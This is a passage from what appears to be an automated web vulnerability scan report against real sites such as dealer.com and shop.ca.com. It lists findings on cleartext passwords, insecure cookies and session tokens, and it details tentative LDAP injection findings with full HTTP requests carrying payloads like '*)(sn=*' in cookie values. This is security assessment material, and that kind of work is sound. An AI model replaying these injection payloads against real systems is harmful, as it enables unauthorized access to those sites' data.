4.302. http://shop.ca.com/applications/email/d_subscribe.asp [__utmb cookie]

4.303. http://shop.ca.com/applications/email/d_subscribe.asp [__utmc cookie]

4.304. http://shop.ca.com/applications/email/d_subscribe.asp [__utmz cookie]

4.305. http://shop.ca.com/applications/email/d_subscribe.asp [_clogin cookie]

4.306. http://shop.ca.com/cgi-bin/ShoppingCart.asp [Cart cookie]

4.307. http://shop.ca.com/cgi-bin/ShoppingCart.asp [CoreID6 cookie]

4.308. http://shop.ca.com/cgi-bin/ShoppingCart.asp [DB cookie]

4.309. http://shop.ca.com/cgi-bin/ShoppingCart.asp [IS3_GSV cookie]

4.310. http://shop.ca.com/cgi-bin/ShoppingCart.asp [IS3_History cookie]

4.311. http://shop.ca.com/cgi-bin/ShoppingCart.asp [SessionId cookie]

4.312. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utma cookie]

4.313. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmb cookie]

4.314. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmc cookie]

4.315. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmz cookie]

4.316. http://shop.ca.com/cgi-bin/ShoppingCart.asp [_clogin cookie]

4.317. http://shop.ca.com/cgi-bin/order.asp [Cart cookie]

4.318. http://shop.ca.com/cgi-bin/order.asp [CoreID6 cookie]

4.319. http://shop.ca.com/cgi-bin/order.asp [DB cookie]

4.320. http://shop.ca.com/cgi-bin/order.asp [IS3_GSV cookie]

4.321. http://shop.ca.com/cgi-bin/order.asp [IS3_History cookie]

4.322. http://shop.ca.com/cgi-bin/order.asp [SessionId cookie]

4.323. http://shop.ca.com/cgi-bin/order.asp [__utma cookie]

4.324. http://shop.ca.com/cgi-bin/order.asp [__utmb cookie]

4.325. http://shop.ca.com/cgi-bin/order.asp [__utmc cookie]

4.326. http://shop.ca.com/cgi-bin/order.asp [__utmz cookie]

4.327. http://shop.ca.com/cgi-bin/order.asp [_clogin cookie]

5. Flash cross-domain policy

5.1. http://cspix.media6degrees.com/crossdomain.xml

5.2. http://images.dealer.com/crossdomain.xml

5.3. http://pictures.dealer.com/crossdomain.xml

5.4. http://pixel.33across.com/crossdomain.xml

5.5. http://static.dealer.com/crossdomain.xml

5.6. http://videos.dealer.com/crossdomain.xml

5.7. http://videos2.dealer.com/crossdomain.xml

5.8. http://mt0.google.com/crossdomain.xml

6. Silverlight cross-domain policy

7. Cleartext submission of password

7.1. http://community.martindale.com/groups/groupdirectory.aspx

7.2. http://community.martindale.com/upgrade-your-connected-account.aspx

7.3. http://tbe.taleo.net/NA8/ats/careers/jobSearch.jsp

7.4. http://www.100zakladok.ru/save/

7.5. http://www.2linkme.com/

7.6. http://www.adifni.com/account/bookmark/

7.7. http://www.adifni.com/account/bookmark/

7.8. http://www.arto.com/section/user/login/

7.9. http://www.auditmypc.com/firewall-test.asp

7.10. http://www.bookmark.it/bookmark.php

7.11. http://www.bookmark.it/bookmark.php

7.12. http://www.bookmerken.de/

7.13. http://www.brainify.com/Bookmark.aspx

7.14. http://www.cirip.ro/post/

7.15. http://www.classicalplace.com/

7.16. http://www.colivia.de/login.php

7.17. http://www.colivia.de/submit.php

7.18. http://www.diglog.com/submit.aspx

7.19. http://www.drimio.com/drimthis/index

7.20. http://www.embarkons.com/sharer.php

7.21. http://www.embarkons.com/sharer.php

7.22. http://www.embarkons.com/sharer.php/a

7.23. http://www.embarkons.com/sharer.php/a

7.24. http://www.embarkons.com/sharer.php/images/close-icon.gif

7.25. http://www.embarkons.com/sharer.php/images/close-icon.gif

7.26. http://www.embarkons.com/sharer.php/images/postit-bulb.gif

7.27. http://www.embarkons.com/sharer.php/images/postit-bulb.gif

7.28. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png

7.29. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png

7.30. http://www.embarkons.com/sharer.php/images/search-con.gif

7.31. http://www.embarkons.com/sharer.php/images/search-con.gif

7.32. http://www.embarkons.com/sharer.php/src/captcha.php

7.33. http://www.embarkons.com/sharer.php/src/captcha.php

7.34. http://www.ezyspot.com/submit

7.35. http://www.forceindya.com/submit

7.36. http://www.fulbright.com/

7.37. http://www.fulbright.com/index.cfm

7.38. http://www.fulbright.com/insite

7.39. http://www.fulbright.com/insite

7.40. http://www.gabbr.com/login/

7.41. http://www.gabbr.com/submit/

7.42. http://www.gamekicker.com/node/add/drigg

7.43. http://www.imera.com.br/post_d.html

7.44. http://www.influx.com.br/

7.45. http://www.jamespot.com/

7.46. http://www.jumptags.com/add/

7.47. http://www.librerio.com/inbox

7.48. http://www.linkagogo.com/go/AddNoPopup

7.49. http://www.livejournal.com/update.bml

7.50. http://www.longislanderotic.com/longislanderotic/forum/

7.51. http://www.longislanderotic.com/longislanderotic/forum/default.asp

7.52. http://www.longislanderotic.com/longislanderotic/forum/insufficient_permission.asp

7.53. http://www.longislanderotic.com/longislanderotic/forum/login_user.asp

7.54. http://www.martindale.com/ContactUs.aspx

7.55. http://www.martindale.com/all/c-england/all-lawyers-1.htm

7.56. http://www.martindale.com/all/c-england/all-lawyers-10.htm

7.57. http://www.martindale.com/all/c-england/all-lawyers-11.htm

7.58. http://www.martindale.com/all/c-england/all-lawyers-2.htm

7.59. http://www.martindale.com/all/c-england/all-lawyers-3.htm

7.60. http://www.martindale.com/all/c-england/all-lawyers-4.htm

7.61. http://www.martindale.com/all/c-england/all-lawyers-5.htm

7.62. http://www.martindale.com/all/c-england/all-lawyers-6.htm

7.63. http://www.martindale.com/all/c-england/all-lawyers-7.htm

7.64. http://www.martindale.com/all/c-england/all-lawyers-8.htm

7.65. http://www.martindale.com/all/c-england/all-lawyers-9.htm

7.66. http://www.martindale.com/all/c-england/all-lawyers.htm

7.67. http://www.phelpsdunbar.com/firm-news/press-release/article/phelps-dunbar-llp-partner-named-mississippi-leader-in-law-1474.html

7.68. http://www.phelpsdunbar.com/firm-news/press-release/article/tampa-attorneys-contribute-to-american-bar-associations-national-fair-labor-standards-act-flsa.html

7.69. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html

7.70. http://www.phelpsdunbar.com/pages/register_newsletters/index.html

8. SSL cookie without secure flag set

8.1. https://auctions.godaddy.com/

8.2. https://cc.dealer.com/views/login

8.3. https://community.qualys.com/docs/DOC-1542

8.4. https://email.phelps.com/exchweb/bin/auth/owaauth.dll

8.5. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js

8.6. https://home.mcafee.com/secure/cart/

8.7. https://home3.ca.com/Login2.aspx

8.8. https://myaccount.bitdefender.com/site/MyAccount/login/

8.9. https://secure.eset.com/us/store/geoIpRedirect

8.10. https://secure.opinionlab.com/ccc01/comment_card.asp

8.11. https://www.box.net/api/1.0/import

8.12. https://www.fathomseo.com/

8.13. https://www.godaddy.com/domains/popups/icannfee.aspx

8.14. https://www.trendsecure.com/my_account/signin/login

8.15. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

8.16. https://cc.dealer.com/views/forgot-password

8.17. https://cc.dealer.com/views/login

8.18. https://www.godaddy.com/gdshop/registrar/search.asp

8.19. https://www.mcafeesecure.com/RatingVerify

8.20. https://www.paypal.com/cgi-bin/webscr

9. Session token in URL

9.1. http://aolproductcentral.aol.com/ClickBroker

9.2. https://aolproductcentral.aol.com/control/additem

9.3. http://bh.contextweb.com/bh/set.aspx

9.4. http://cc.dealer.com/views/login

9.5. http://cc.dealer.com/views/login

9.6. https://cc.dealer.com/views/login

9.7. http://fls.doubleclick.net/activityi

9.8. http://l.sharethis.com/pview

9.9. http://mbox9e.offermatica.com/m2/eset/mbox/standard

9.10. http://tbe.taleo.net/NA8/ats/careers/jobSearch.jsp

9.11. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard

9.12. http://www.amazon.com/gp/product/0975264001

9.13. http://www.dzone.com/links/add.html

9.14. http://www.facebook.com/extern/login_status.php

9.15. http://www.hldataprotection.com/

9.16. http://www.pages05.net/WTS/event.jpeg

9.17. http://www.webroot.com/En_US/about-press-room-in-the-news.html

10. ASP.NET ViewState without MAC enabled



1. LDAP injection  next
There are 12 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.



1.1. http://www.dealer.com/lvlc/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/inventory-marketing/ cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /lvlc/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/inventory-marketing/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/inventory-marketing/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=*)(sn=*; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002780; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19816
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:20:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003257; expires=Mon, 16-Apr-2012 01:20:57 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>There is one system I can log into to access all my tools.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We went from a site that was converting at a rate of 2 or 3 percent. Now we&#8217;re converting at 10, 11, 12, 13 percent depending on the month.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com now almost 3 years and we&#8217;re most impressed with the customer service and technology that they provide us.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertisin
...[SNIP]...

Request 2

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=*)!(sn=*; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002780; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20064
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:20:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003258; expires=Mon, 16-Apr-2012 01:20:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Throughout my first few years here, researching and developing both a website and the Internet Sales Department for this dealership, I have used several nationally known Internet Service Providers (ISP). Dealer.com ended up the clear winner for more reasons than I &#8230;</p>
   <cite>Mike Poulin, Shearer Pontiac Cadillac Hummer</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p> If I were to suggest any web provider in the world, I would suggest Dealer.com. Sign up today!</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The TotalControl DOMINATOR package really seems like the best automotive pay-per-click tool that I have discovered to date.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com now almost 3 years and we&#8217;re most impressed with the customer service and technology that they provide us.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Mar
...[SNIP]...

1.2. http://www.dealer.com/lvlc/media/uploads/page/loading.gif [exp_last_activity cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /lvlc/media/uploads/page/loading.gif

Issue detail

The exp_last_activity cookie appears to be vulnerable to LDAP injection attacks.

The payloads b330b37b000bf702)(sn=* and b330b37b000bf702)!(sn=* were each submitted in the exp_last_activity cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=b330b37b000bf702)(sn=*; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20004
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:27:58 GMT
Connection: close
Set-Cookie: exp_last_visit=b330b37b000bf702%29%28sn%3D%2A; expires=Mon, 16-Apr-2012 01:27:58 GMT; path=/
Set-Cookie: exp_last_activity=1303003678; expires=Mon, 16-Apr-2012 01:27:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From an Enterprise Level, Dealer.com's products have saved me hours a month in gathering my reporting and understanding what our site is doing for us. </p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The TotalControl DOMINATOR package really seems like the best automotive pay-per-click tool that I have discovered to date.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtil
...[SNIP]...

Request 2

GET /lvlc/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/lvlc/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=b330b37b000bf702)!(sn=*; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A1%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3Bi%3A2%3Bs%3A17%3A%22%2Fcompany%2Fhistory%2F%22%3Bi%3A3%3Bs%3A16%3A%22%2Fcompany%2Fawards%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.38.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20158
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:00 GMT
Connection: close
Set-Cookie: exp_last_visit=b330b37b000bf702%29%21%28sn%3D%2A; expires=Mon, 16-Apr-2012 01:27:59 GMT; path=/
Set-Cookie: exp_last_activity=1303003679; expires=Mon, 16-Apr-2012 01:27:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>What I like best about SocialRelationship Manager&#8482; is it enables me as a dealer to both listen and to speak to my audience and customers on a platform that is so simple to use.</p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
...[SNIP]...

1.3. http://www.dealer.com/products/inventory-marketing/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/lead-management/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/inventory-marketing/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/lead-management/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/lead-management/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/inventory-marketing/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/inventory-marketing/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; 